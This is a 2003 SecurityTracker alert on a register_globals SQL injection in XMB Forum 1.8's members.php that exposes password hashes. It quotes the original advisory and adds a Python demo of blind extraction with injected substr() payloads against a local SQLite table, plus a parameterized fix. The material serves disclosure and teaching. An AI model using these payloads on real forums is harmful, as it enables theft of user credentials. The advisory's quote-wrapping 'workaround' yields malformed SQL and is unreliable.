XMB Forum Input Validation Hole in 'members.php' Lets Remote Users Inject SQL Commands

SecurityTracker Alert ID: 1006622
CVE Reference: GENERIC-MAP-NOMATCH
Date: Apr 22 2003
Impact: Disclosure of system information, Disclosure of user information
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): 1.8

Description: A vulnerability was reported in XMB Forum (Partagium) message board software. A remote user can obtain hashed user passwords.
Binary Bugs reported that the registration code in 'members.php' lets a remote user inject SQL commands and retrieve the password hash of any XMB Forum user, including the administrator.
The script builds its duplicate-account query by concatenating the variables $email1 and $email2, which it assigns on only one code path. If 'register_globals' is enabled in 'php.ini', a remote user can supply those variables as request parameters and have 'members.php' execute attacker-chosen SQL against the forum database. The reporter states that password hashes can be retrieved this way through the SQL mid() function.
A demonstration exploit is available at:
http://www.bbugs.org/archiv/exmb.c

Impact: A remote user can execute certain SQL commands against the forum database. This can be used to retrieve password hashes for registered users.

Solution: The vendor has released a fix (1.8 Final Edition SP1), available at:
http://www.xmbforum.com/download/#partagium
As an interim mitigation, setting register_globals = Off in php.ini (the default since PHP 4.2.0) stops request parameters from populating $email1 and $email2, which closes this particular injection path.

Vendor URL: www.xmbforum.com/home/

Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: <zeez@bbugs.org>

Message History:
None.

Source Message Contents

Date: 22 Apr 2003 17:08:38 -0000
From: <zeez@bbugs.org>
Subject: XMB 1.8 Partagium SQL Injection Bug

- Binary Bugs Advisory BB-2003-1 *XMB SQL injection* -
Product: XMB 1.8 Partagium Final
Vendor: http://www.xmbforum.com
Versions affected: 1.8, possibly others
Impact: SQL injection vulnerability
Risk: Medium/High
Vendor status: Notified/New version available
Release date: April 22, 2003
I. Overview
XMB, the so-called 'Extreme Message Board', is a widely used forum around the internet. The vendor proclaims its product to be "the life behind more than 3 million boards".
II. Impact
There is a SQL injection bug in the registration processing. Using specially crafted parameters, a remote attacker is able to steal password hashes from any registered user, including the super administrator.
III. Details
Snippet:
--- members.php ---
// $email1 and $email2 are assigned only inside this branch; on every
// other path they keep whatever value they already had, which with
// register_globals on is the request parameter of the same name.
if($doublee == "off" && strstr($email, "@")){
    $email = trim($email);
    $email1 = ", email";
    $email2 = "OR email='$email'";
}
$username = trim($username);
// Both variables are interpolated straight into the SQL string.
$query = $db->query("SELECT username$email1 FROM $table_members WHERE username='$username' $email2");
-------------------
If the webserver running XMB has 'register_globals' activated in its php.ini, an attacker is able to modify the SQL query using the unchecked variables $email1 and $email2. The stealing of password hashes can be realized by the well-known SQL mid() method.
IV. Exploit
A proof-of-concept exploit can be found on
http://www.bbugs.org.
V. Workaround
* Change line 190 to:
$query = $db->query("SELECT username'$email1' FROM $table_members WHERE username='$username' '$email2'");
* Or upgrade to XMB 1.8 Final Edition SP1
VI. Reference
* Original advisory:
http://www.bbugs.org/advisories/BB-2003-1-XMB
- Binary Bugs
http://www.bbugs.org
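The following Python script is an added example, not code from XMB, from SecurityTracker, or from the Binary Bugs advisory. It re-creates the query construction described in the Description above and in section III of the quoted advisory, runs the blind extraction the reporter calls the mid() method, and shows the parameterized query that removes the problem. Its assumptions: a members table with username, password and email columns holding md5 hashes (the column names are a guess), SQLite's substr() standing in for MySQL's MID(), register_globals modelled by reading $email1 and $email2 from the request whenever the script does not assign them, and that the outcome of the duplicate-account check is observable to the requester, which is what a boolean-based extraction needs and the advisory does not spell out.

```python
import hashlib
import sqlite3

# Constructed sample data (not from XMB): one administrator row. The md5
# hash format and the column names are assumptions for this example.
ADMIN_HASH = hashlib.md5(b"s3cret!").hexdigest()


def make_db():
    """Build an in-memory members table standing in for XMB's MySQL table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT, email TEXT)")
    db.execute("INSERT INTO members VALUES (?, ?, ?)",
               ("admin", ADMIN_HASH, "admin@example.invalid"))
    db.commit()
    return db


def vulnerable_name_taken(db, request, doublee="off"):
    """Re-creates the members.php logic under register_globals=On: every
    request parameter starts life as a PHP variable, so $email1/$email2 are
    attacker-supplied unless the 'if' branch overwrites them. Returns True
    when the duplicate check finds a row (registration refused)."""
    email = request.get("email", "")
    email1 = request.get("email1", "")   # attacker-controlled when the branch is skipped
    email2 = request.get("email2", "")
    if doublee == "off" and "@" in email:
        email = email.strip()
        email1 = ", email"
        email2 = f"OR email='{email}'"
    username = request.get("username", "").strip()
    # Same string concatenation as the original query: no escaping, no binding.
    query = f"SELECT username{email1} FROM members WHERE username='{username}' {email2}"
    return db.execute(query).fetchone() is not None


def extract_hash(db, target="admin", length=32):
    """Blind, boolean-based recovery of the target's password hash through
    $email2, one hex digit per request: the advisory's 'mid() method'
    (MySQL MID(); SQLite spells it substr())."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in "0123456789abcdef":
            request = {
                "username": "nobody_zz",   # must not exist, so only the injected clause can match
                "email": "no-at-sign",     # no '@' keeps the script from overwriting $email1/$email2
                "email1": "",
                "email2": f"OR (username='{target}' AND substr(password,{pos},1)='{c}')",
            }
            if vulnerable_name_taken(db, request):
                recovered += c
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return recovered


def safe_name_taken(db, username, email=""):
    """Hardened equivalent: the SQL text is fixed in the source and the user
    values are bound parameters, so nothing in the request can change the
    query shape whether or not register_globals is on."""
    username = username.strip()
    if "@" in email:
        row = db.execute(
            "SELECT username, email FROM members WHERE username=? OR email=?",
            (username, email.strip()),
        ).fetchone()
    else:
        row = db.execute(
            "SELECT username FROM members WHERE username=?", (username,)
        ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    recovered = extract_hash(db)
    print("recovered:", recovered)
    print("matches  :", recovered == ADMIN_HASH)
```

Each probe in extract_hash() is one registration request: the base condition (a username that does not exist) is always false, so the server's answer depends only on the injected comparison, and 32 positions times at most 16 candidates recovers the whole hash. The hardened function keeps the original's two query shapes but moves every user-supplied value into a bound parameter, which is the property the SP1 fix needs to provide as well.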